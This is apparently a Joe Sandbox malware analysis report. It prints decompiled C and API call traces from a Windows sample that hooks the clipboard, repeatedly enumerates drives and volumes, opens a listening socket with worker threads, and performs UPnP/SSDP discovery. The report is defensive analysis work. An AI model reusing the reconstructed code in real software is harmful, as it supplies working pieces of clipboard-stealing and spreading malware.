                                                                                                                                                                                                                                                                  • OpenClipboard.USER32(00000000), ref: 00403FD7
                                                                                                                                                                                                                                                                  • GetClipboardData.USER32 ref: 00403FE9
                                                                                                                                                                                                                                                                  • RegisterRawInputDevices.USER32(?,00000001,0000000C), ref: 004040F0
                                                                                                                                                                                                                                                                  • ChangeClipboardChain.USER32(?,?), ref: 004040FE
                                                                                                                                                                                                                                                                  • DefWindowProcA.USER32(?,?,?,?), ref: 00404114
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.263050024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263037424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263087804.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263093386.0000000000412000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_l3Qj8QhTYZ.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Clipboard$Window$Long$AvailableChainChangeDataDevicesFormatInputOpenProcRegisterViewer
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3549449529-0
                                                                                                                                                                                                                                                                  • Opcode ID: a69993eea088427a97e9e977c118ea55afaf776965cc7ea7f3e60b572320150e
                                                                                                                                                                                                                                                                  • Instruction ID: 96edcc278ed0497f99117f545b7404bf08a66114077c170e205bfa907dcbbdbe
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a69993eea088427a97e9e977c118ea55afaf776965cc7ea7f3e60b572320150e
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4C714EB5900209EFDB14DFA4C988BAE7BB8AF48301F14453AF605BB2D0D7789E44CB59
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  C-Code - Quality: 50%
                                                                                                                                                                                                                                                                  			E004051D0() {
                                                                                                                                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                                                                                                                                  				intOrPtr _v12;
                                                                                                                                                                                                                                                                  				intOrPtr _v16;
                                                                                                                                                                                                                                                                  				short _v24;
                                                                                                                                                                                                                                                                  				short _v556;
                                                                                                                                                                                                                                                                  				short _v2604;
                                                                                                                                                                                                                                                                  				intOrPtr _v2608;
                                                                                                                                                                                                                                                                  				union _ULARGE_INTEGER _v2612;
                                                                                                                                                                                                                                                                  				long _v2616;
                                                                                                                                                                                                                                                                  				short _v3148;
                                                                                                                                                                                                                                                                  				intOrPtr _v3152;
                                                                                                                                                                                                                                                                  				intOrPtr _t34;
                                                                                                                                                                                                                                                                  				intOrPtr _t38;
                                                                                                                                                                                                                                                                  				struct %anon54 _t43;
                                                                                                                                                                                                                                                                  				intOrPtr _t63;
                                                                                                                                                                                                                                                                  				void* _t68;
                                                                                                                                                                                                                                                                  				void* _t69;
                                                                                                                                                                                                                                                                  				void* _t70;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				Sleep(0x3e8);
                                                                                                                                                                                                                                                                  				GetModuleFileNameW(0, 0x412f78, 0x104);
                                                                                                                                                                                                                                                                  				_t34 = E0040CEA0(0x412f78);
                                                                                                                                                                                                                                                                  				_t69 = _t68 + 4;
                                                                                                                                                                                                                                                                  				 *0x412f70 = _t34;
                                                                                                                                                                                                                                                                  				while(1 != 0) {
                                                                                                                                                                                                                                                                  					_v8 = E004049E0();
                                                                                                                                                                                                                                                                  					_v12 = 2;
                                                                                                                                                                                                                                                                  					while(_v12 <= 0x19) {
                                                                                                                                                                                                                                                                  						_t38 = E00404980(_v8, _v12,  &_v24);
                                                                                                                                                                                                                                                                  						_t69 = _t69 + 0xc;
                                                                                                                                                                                                                                                                  						_v16 = _t38;
                                                                                                                                                                                                                                                                  						_v3152 = _v16;
                                                                                                                                                                                                                                                                  						if(_v3152 == 2 || _v3152 == 4) {
                                                                                                                                                                                                                                                                  							GetVolumeInformationW( &_v24,  &_v3148, 0x105, 0, 0,  &_v2616, 0, 0);
                                                                                                                                                                                                                                                                  							GetDiskFreeSpaceExW( &_v24, 0,  &_v2612, 0);
                                                                                                                                                                                                                                                                  							_push(0);
                                                                                                                                                                                                                                                                  							_push(0x40000000);
                                                                                                                                                                                                                                                                  							_t63 = _v2608;
                                                                                                                                                                                                                                                                  							_push(_t63);
                                                                                                                                                                                                                                                                  							_t43 = _v2612.LowPart;
                                                                                                                                                                                                                                                                  							_push(_t43);
                                                                                                                                                                                                                                                                  							L0040EB30();
                                                                                                                                                                                                                                                                  							_push(_t63);
                                                                                                                                                                                                                                                                  							wsprintfW( &_v556, L" (%dGB)", _t43);
                                                                                                                                                                                                                                                                  							_t70 = _t69 + 0x10;
                                                                                                                                                                                                                                                                  							if((_v3148 & 0x0000ffff) == 0) {
                                                                                                                                                                                                                                                                  								wsprintfW( &_v3148, L"Unnamed volume");
                                                                                                                                                                                                                                                                  								_t70 = _t70 + 8;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							wsprintfW( &_v2604, L"%s%s",  &_v3148,  &_v556);
                                                                                                                                                                                                                                                                  							E00404CF0( &_v24,  &_v2604, _v2616, ( &_v556 & 0xffffff00 | _v16 == 0x00000004) & 0x000000ff);
                                                                                                                                                                                                                                                                  							_t69 = _t70 + 0x20;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						_v12 = _v12 + 1;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					Sleep(0x7d0);
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				ExitThread(0);
                                                                                                                                                                                                                                                                  			}





















                                                                                                                                                                                                                                                                  0x004051de
                                                                                                                                                                                                                                                                  0x004051f0
                                                                                                                                                                                                                                                                  0x004051fb
                                                                                                                                                                                                                                                                  0x00405200
                                                                                                                                                                                                                                                                  0x00405203
                                                                                                                                                                                                                                                                  0x00405208
                                                                                                                                                                                                                                                                  0x0040521a
                                                                                                                                                                                                                                                                  0x0040521d
                                                                                                                                                                                                                                                                  0x0040522f
                                                                                                                                                                                                                                                                  0x00405245
                                                                                                                                                                                                                                                                  0x0040524a
                                                                                                                                                                                                                                                                  0x0040524d
                                                                                                                                                                                                                                                                  0x00405253
                                                                                                                                                                                                                                                                  0x00405260
                                                                                                                                                                                                                                                                  0x0040528f
                                                                                                                                                                                                                                                                  0x004052a4
                                                                                                                                                                                                                                                                  0x004052aa
                                                                                                                                                                                                                                                                  0x004052ac
                                                                                                                                                                                                                                                                  0x004052b1
                                                                                                                                                                                                                                                                  0x004052b7
                                                                                                                                                                                                                                                                  0x004052b8
                                                                                                                                                                                                                                                                  0x004052be
                                                                                                                                                                                                                                                                  0x004052bf
                                                                                                                                                                                                                                                                  0x004052c4
                                                                                                                                                                                                                                                                  0x004052d2
                                                                                                                                                                                                                                                                  0x004052d8
                                                                                                                                                                                                                                                                  0x004052e4
                                                                                                                                                                                                                                                                  0x004052f2
                                                                                                                                                                                                                                                                  0x004052f8
                                                                                                                                                                                                                                                                  0x004052f8
                                                                                                                                                                                                                                                                  0x00405315
                                                                                                                                                                                                                                                                  0x0040533b
                                                                                                                                                                                                                                                                  0x00405340
                                                                                                                                                                                                                                                                  0x00405340
                                                                                                                                                                                                                                                                  0x0040522c
                                                                                                                                                                                                                                                                  0x0040522c
                                                                                                                                                                                                                                                                  0x0040534d
                                                                                                                                                                                                                                                                  0x0040534d
                                                                                                                                                                                                                                                                  0x0040535a

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000003E8), ref: 004051DE
                                                                                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,00412F78,00000104), ref: 004051F0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040CEA0: CreateFileW.KERNEL32(00405200,80000000,00000001,00000000,00000003,00000000,00000000,00405200), ref: 0040CEC0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040CEA0: GetFileSize.KERNEL32(000000FF,00000000), ref: 0040CED5
                                                                                                                                                                                                                                                                    • Part of subcall function 0040CEA0: CloseHandle.KERNEL32(000000FF), ref: 0040CEE2
                                                                                                                                                                                                                                                                  • ExitThread.KERNEL32 ref: 0040535A
                                                                                                                                                                                                                                                                    • Part of subcall function 004049E0: GetLogicalDrives.KERNEL32 ref: 004049E6
                                                                                                                                                                                                                                                                    • Part of subcall function 004049E0: RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00404A34
                                                                                                                                                                                                                                                                    • Part of subcall function 004049E0: RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00404A61
                                                                                                                                                                                                                                                                    • Part of subcall function 004049E0: RegCloseKey.ADVAPI32(?), ref: 00404A7E
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000007D0), ref: 0040534D
                                                                                                                                                                                                                                                                    • Part of subcall function 00404980: lstrcpyW.KERNEL32 ref: 004049D3
                                                                                                                                                                                                                                                                  • GetVolumeInformationW.KERNEL32(?,?,00000105,00000000,00000000,?,00000000,00000000), ref: 0040528F
                                                                                                                                                                                                                                                                  • GetDiskFreeSpaceExW.KERNEL32(?,00000000,?,00000000), ref: 004052A4
                                                                                                                                                                                                                                                                  • _aulldiv.NTDLL(?,?,40000000,00000000), ref: 004052BF
                                                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 004052D2
                                                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 004052F2
                                                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 00405315
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.263050024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263037424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263087804.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263093386.0000000000412000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_l3Qj8QhTYZ.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Filewsprintf$CloseSleep$CreateDiskDrivesExitFreeHandleInformationLogicalModuleNameOpenQuerySizeSpaceThreadValueVolume_aulldivlstrcpy
                                                                                                                                                                                                                                                                  • String ID: (%dGB)$%s%s$Unnamed volume
                                                                                                                                                                                                                                                                  • API String ID: 1650488544-2117135753
                                                                                                                                                                                                                                                                  • Opcode ID: a00c0e5fe5589e0b473d0fbbe310c4b90a92e1ff122ef468d6126c8c6c6c285f
                                                                                                                                                                                                                                                                  • Instruction ID: ed61c20226ee7d10f6afdc96e326cade5679569eb23418b562d9eee10a8c52da
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a00c0e5fe5589e0b473d0fbbe310c4b90a92e1ff122ef468d6126c8c6c6c285f
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 24416471900218ABEB24DB94DD45FEF7378AF44700F1041BAF209B55D1DAB45A88CF6A
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 45%
                                                                                                                                                                                                                                                                  			E0040E820(void* __esi) {
                                                                                                                                                                                                                                                                  				struct _SYSTEM_INFO _v36;
                                                                                                                                                                                                                                                                  				short _v40;
                                                                                                                                                                                                                                                                  				char _v77;
                                                                                                                                                                                                                                                                  				short _v82;
                                                                                                                                                                                                                                                                  				short _v86;
                                                                                                                                                                                                                                                                  				short _v90;
                                                                                                                                                                                                                                                                  				short _v92;
                                                                                                                                                                                                                                                                  				short _v94;
                                                                                                                                                                                                                                                                  				short _v96;
                                                                                                                                                                                                                                                                  				short _v98;
                                                                                                                                                                                                                                                                  				char _v100;
                                                                                                                                                                                                                                                                  				void* __edi;
                                                                                                                                                                                                                                                                  				intOrPtr* _t30;
                                                                                                                                                                                                                                                                  				void* _t33;
                                                                                                                                                                                                                                                                  				void* _t36;
                                                                                                                                                                                                                                                                  				intOrPtr _t37;
                                                                                                                                                                                                                                                                  				short _t39;
                                                                                                                                                                                                                                                                  				intOrPtr _t40;
                                                                                                                                                                                                                                                                  				intOrPtr* _t54;
                                                                                                                                                                                                                                                                  				void* _t56;
                                                                                                                                                                                                                                                                  				void* _t58;
                                                                                                                                                                                                                                                                  				void* _t59;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_t30 = E00408820(0x4c);
                                                                                                                                                                                                                                                                  				_t54 = _t30;
                                                                                                                                                                                                                                                                  				_t59 = _t58 + 4;
                                                                                                                                                                                                                                                                  				if(_t54 == 0) {
                                                                                                                                                                                                                                                                  					return _t30;
                                                                                                                                                                                                                                                                  				} else {
                                                                                                                                                                                                                                                                  					 *_t54 = 0x494f4350;
                                                                                                                                                                                                                                                                  					GetSystemInfo( &_v36);
                                                                                                                                                                                                                                                                  					_t45 = _v36.dwNumberOfProcessors;
                                                                                                                                                                                                                                                                  					_t3 = _t54 + 0x20; // 0x20
                                                                                                                                                                                                                                                                  					 *((intOrPtr*)(_t54 + 4)) = _v36.dwNumberOfProcessors + _t45;
                                                                                                                                                                                                                                                                  					InitializeCriticalSection(_t3);
                                                                                                                                                                                                                                                                  					_t33 = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                                                  					 *(_t54 + 0x10) = _t33;
                                                                                                                                                                                                                                                                  					if(_t33 == 0) {
                                                                                                                                                                                                                                                                  						L12:
                                                                                                                                                                                                                                                                  						E0040DE00(_t54);
                                                                                                                                                                                                                                                                  						return 0;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					_t36 = CreateIoCompletionPort(0xffffffff, 0, 0, 0);
                                                                                                                                                                                                                                                                  					 *(_t54 + 8) = _t36;
                                                                                                                                                                                                                                                                  					if(_t36 == 0) {
                                                                                                                                                                                                                                                                  						goto L12;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					_t37 = E0040B810(_t45);
                                                                                                                                                                                                                                                                  					 *((intOrPtr*)(_t54 + 0xc)) = _t37;
                                                                                                                                                                                                                                                                  					if(_t37 == 0) {
                                                                                                                                                                                                                                                                  						goto L12;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					__imp__WSASocketA(2, 1, 6, 0, 0, 1);
                                                                                                                                                                                                                                                                  					 *((intOrPtr*)(_t54 + 0x14)) = _t37;
                                                                                                                                                                                                                                                                  					if(_t37 == 0xffffffff) {
                                                                                                                                                                                                                                                                  						goto L12;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					_v77 = 1;
                                                                                                                                                                                                                                                                  					__imp__#21(_t37, 0xffff, 4,  &_v77, 1);
                                                                                                                                                                                                                                                                  					_v94 = 0;
                                                                                                                                                                                                                                                                  					_v90 = 0;
                                                                                                                                                                                                                                                                  					_v86 = 0;
                                                                                                                                                                                                                                                                  					_v82 = 0;
                                                                                                                                                                                                                                                                  					_t39 = _v40;
                                                                                                                                                                                                                                                                  					_v96 = 2;
                                                                                                                                                                                                                                                                  					_v92 = _t39;
                                                                                                                                                                                                                                                                  					__imp__#9(_v36.dwOemId);
                                                                                                                                                                                                                                                                  					_v98 = _t39;
                                                                                                                                                                                                                                                                  					_t40 =  *((intOrPtr*)(_t54 + 0x14));
                                                                                                                                                                                                                                                                  					__imp__#2(_t40,  &_v100, 0x10);
                                                                                                                                                                                                                                                                  					if(_t40 == 0xffffffff) {
                                                                                                                                                                                                                                                                  						goto L12;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					__imp__#13( *((intOrPtr*)(_t54 + 0x14)), 0x7fffffff);
                                                                                                                                                                                                                                                                  					if(_t40 == 0xffffffff) {
                                                                                                                                                                                                                                                                  						goto L12;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					__imp__WSACreateEvent();
                                                                                                                                                                                                                                                                  					 *((intOrPtr*)(_t54 + 0x18)) = _t40;
                                                                                                                                                                                                                                                                  					if(_t40 == 0) {
                                                                                                                                                                                                                                                                  						goto L12;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					__imp__WSAEventSelect( *((intOrPtr*)(_t54 + 0x14)), _t40, 8);
                                                                                                                                                                                                                                                                  					if(_t40 == 0xffffffff) {
                                                                                                                                                                                                                                                                  						goto L12;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					_t56 = 0;
                                                                                                                                                                                                                                                                  					if( *((intOrPtr*)(_t54 + 4)) > 0) {
                                                                                                                                                                                                                                                                  						do {
                                                                                                                                                                                                                                                                  							E0040B8C0( *((intOrPtr*)(_t54 + 0xc)), 0, E0040E750, _t54, 0, 0);
                                                                                                                                                                                                                                                                  							_t56 = _t56 + 1;
                                                                                                                                                                                                                                                                  							_t59 = _t59 + 0x18;
                                                                                                                                                                                                                                                                  						} while (_t56 <  *((intOrPtr*)(_t54 + 4)));
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					E0040B8C0( *((intOrPtr*)(_t54 + 0xc)), 0, E0040E120, _t54, 0, 0);
                                                                                                                                                                                                                                                                  					return _t54;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  			}

























                                                                                                                                                                                                                                                                  0x0040e826
                                                                                                                                                                                                                                                                  0x0040e82b
                                                                                                                                                                                                                                                                  0x0040e82d
                                                                                                                                                                                                                                                                  0x0040e832
                                                                                                                                                                                                                                                                  0x0040e9aa
                                                                                                                                                                                                                                                                  0x0040e838
                                                                                                                                                                                                                                                                  0x0040e83d
                                                                                                                                                                                                                                                                  0x0040e843
                                                                                                                                                                                                                                                                  0x0040e849
                                                                                                                                                                                                                                                                  0x0040e84d
                                                                                                                                                                                                                                                                  0x0040e854
                                                                                                                                                                                                                                                                  0x0040e857
                                                                                                                                                                                                                                                                  0x0040e865
                                                                                                                                                                                                                                                                  0x0040e86b
                                                                                                                                                                                                                                                                  0x0040e870
                                                                                                                                                                                                                                                                  0x0040e99f
                                                                                                                                                                                                                                                                  0x0040e99f
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040e9a4
                                                                                                                                                                                                                                                                  0x0040e87e
                                                                                                                                                                                                                                                                  0x0040e884
                                                                                                                                                                                                                                                                  0x0040e889
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040e88f
                                                                                                                                                                                                                                                                  0x0040e894
                                                                                                                                                                                                                                                                  0x0040e899
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040e8ab
                                                                                                                                                                                                                                                                  0x0040e8b1
                                                                                                                                                                                                                                                                  0x0040e8b7
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040e8cc
                                                                                                                                                                                                                                                                  0x0040e8d1
                                                                                                                                                                                                                                                                  0x0040e8dd
                                                                                                                                                                                                                                                                  0x0040e8e1
                                                                                                                                                                                                                                                                  0x0040e8e5
                                                                                                                                                                                                                                                                  0x0040e8e9
                                                                                                                                                                                                                                                                  0x0040e8ee
                                                                                                                                                                                                                                                                  0x0040e8f8
                                                                                                                                                                                                                                                                  0x0040e8fd
                                                                                                                                                                                                                                                                  0x0040e901
                                                                                                                                                                                                                                                                  0x0040e90d
                                                                                                                                                                                                                                                                  0x0040e912
                                                                                                                                                                                                                                                                  0x0040e917
                                                                                                                                                                                                                                                                  0x0040e920
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040e92f
                                                                                                                                                                                                                                                                  0x0040e938
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040e93a
                                                                                                                                                                                                                                                                  0x0040e940
                                                                                                                                                                                                                                                                  0x0040e945
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040e94e
                                                                                                                                                                                                                                                                  0x0040e957
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040e95a
                                                                                                                                                                                                                                                                  0x0040e95f
                                                                                                                                                                                                                                                                  0x0040e961
                                                                                                                                                                                                                                                                  0x0040e971
                                                                                                                                                                                                                                                                  0x0040e976
                                                                                                                                                                                                                                                                  0x0040e977
                                                                                                                                                                                                                                                                  0x0040e97a
                                                                                                                                                                                                                                                                  0x0040e961
                                                                                                                                                                                                                                                                  0x0040e98f
                                                                                                                                                                                                                                                                  0x0040e99e
                                                                                                                                                                                                                                                                  0x0040e99e

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetSystemInfo.KERNEL32(?), ref: 0040E843
                                                                                                                                                                                                                                                                  • InitializeCriticalSection.KERNEL32(00000020), ref: 0040E857
                                                                                                                                                                                                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040E865
                                                                                                                                                                                                                                                                  • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000), ref: 0040E87E
                                                                                                                                                                                                                                                                    • Part of subcall function 0040B810: InitializeCriticalSection.KERNEL32(-00000004), ref: 0040B82E
                                                                                                                                                                                                                                                                  • WSASocketA.WS2_32(00000002,00000001,00000006,00000000,00000000,00000001), ref: 0040E8AB
                                                                                                                                                                                                                                                                  • setsockopt.WS2_32 ref: 0040E8D1
                                                                                                                                                                                                                                                                  • htons.WS2_32(?), ref: 0040E901
                                                                                                                                                                                                                                                                  • bind.WS2_32(?,00000004,00000010), ref: 0040E917
                                                                                                                                                                                                                                                                  • listen.WS2_32(?,7FFFFFFF), ref: 0040E92F
                                                                                                                                                                                                                                                                  • WSACreateEvent.WS2_32 ref: 0040E93A
                                                                                                                                                                                                                                                                  • WSAEventSelect.WS2_32(?,00000000,00000008), ref: 0040E94E
                                                                                                                                                                                                                                                                    • Part of subcall function 0040B8C0: EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040B8E4
                                                                                                                                                                                                                                                                    • Part of subcall function 0040B8C0: CreateThread.KERNEL32 ref: 0040B93F
                                                                                                                                                                                                                                                                    • Part of subcall function 0040B8C0: GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040B97C
                                                                                                                                                                                                                                                                    • Part of subcall function 0040B8C0: GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040B987
                                                                                                                                                                                                                                                                    • Part of subcall function 0040B8C0: DuplicateHandle.KERNEL32(00000000), ref: 0040B98E
                                                                                                                                                                                                                                                                    • Part of subcall function 0040B8C0: LeaveCriticalSection.KERNEL32(-00000004), ref: 0040B9A2
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.263050024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263037424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263087804.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263093386.0000000000412000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_l3Qj8QhTYZ.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CreateCriticalSection$Event$CurrentInitializeProcess$CompletionDuplicateEnterHandleInfoLeavePortSelectSocketSystemThreadbindhtonslistensetsockopt
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1603358586-0
                                                                                                                                                                                                                                                                  • Opcode ID: 0f8a37c2dc507434d0e9753ac2c7b319f5b517dc92e0285aa238007e77300a48
                                                                                                                                                                                                                                                                  • Instruction ID: 90be5a7511d59d458e732dc8095ee9a9d8f3c027a684bd61592a782dd0d87169
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0f8a37c2dc507434d0e9753ac2c7b319f5b517dc92e0285aa238007e77300a48
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 274191B4644702BBD2209F798C06F1AB7A4BF84710F108A3AF668E66D0E774E454C799
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • socket.WS2_32(00000002,00000002,00000011), ref: 0040C2BA
                                                                                                                                                                                                                                                                  • htons.WS2_32(0000076C), ref: 0040C2F0
                                                                                                                                                                                                                                                                  • inet_addr.WS2_32(239.255.255.250), ref: 0040C2FF
                                                                                                                                                                                                                                                                  • setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040C31D
                                                                                                                                                                                                                                                                    • Part of subcall function 00409260: htons.WS2_32(00000050), ref: 0040928D
                                                                                                                                                                                                                                                                    • Part of subcall function 00409260: socket.WS2_32(00000002,00000001,00000000), ref: 004092AD
                                                                                                                                                                                                                                                                    • Part of subcall function 00409260: connect.WS2_32(000000FF,?,00000010), ref: 004092C6
                                                                                                                                                                                                                                                                    • Part of subcall function 00409260: getsockname.WS2_32(000000FF,?,00000010), ref: 004092F8
                                                                                                                                                                                                                                                                  • bind.WS2_32(000000FF,?,00000010), ref: 0040C353
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(0040F578,00000000,?,00000010), ref: 0040C36C
                                                                                                                                                                                                                                                                  • sendto.WS2_32(000000FF,0040F578,00000000), ref: 0040C37B
                                                                                                                                                                                                                                                                  • ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040C395
                                                                                                                                                                                                                                                                    • Part of subcall function 0040C1B0: recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040C1FE
                                                                                                                                                                                                                                                                    • Part of subcall function 0040C1B0: Sleep.KERNEL32(000003E8), ref: 0040C20E
                                                                                                                                                                                                                                                                    • Part of subcall function 0040C1B0: StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040C22B
                                                                                                                                                                                                                                                                    • Part of subcall function 0040C1B0: StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040C241
                                                                                                                                                                                                                                                                    • Part of subcall function 0040C1B0: StrChrA.SHLWAPI(?,0000000D), ref: 0040C26E
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.263050024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263037424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263087804.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263093386.0000000000412000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_l3Qj8QhTYZ.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: htonssocket$Sleepbindconnectgetsocknameinet_addrioctlsocketlstrlenrecvfromsendtosetsockopt
                                                                                                                                                                                                                                                                  • String ID: 239.255.255.250
                                                                                                                                                                                                                                                                  • API String ID: 726339449-2186272203
                                                                                                                                                                                                                                                                  • Opcode ID: 5e9397e9030d774dfc7fde00dfa861a312c84f2fb1eeac03248b702da364cb9a
                                                                                                                                                                                                                                                                  • Instruction ID: 01a8e4080b6b474666e7a6222e05c129926e514e684bf986329747a216381769
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5e9397e9030d774dfc7fde00dfa861a312c84f2fb1eeac03248b702da364cb9a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CE4138B4E00208EBDB14DFE4E985BEEBBB5EF48304F108179E505B7290E7755A05CB59
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 44%
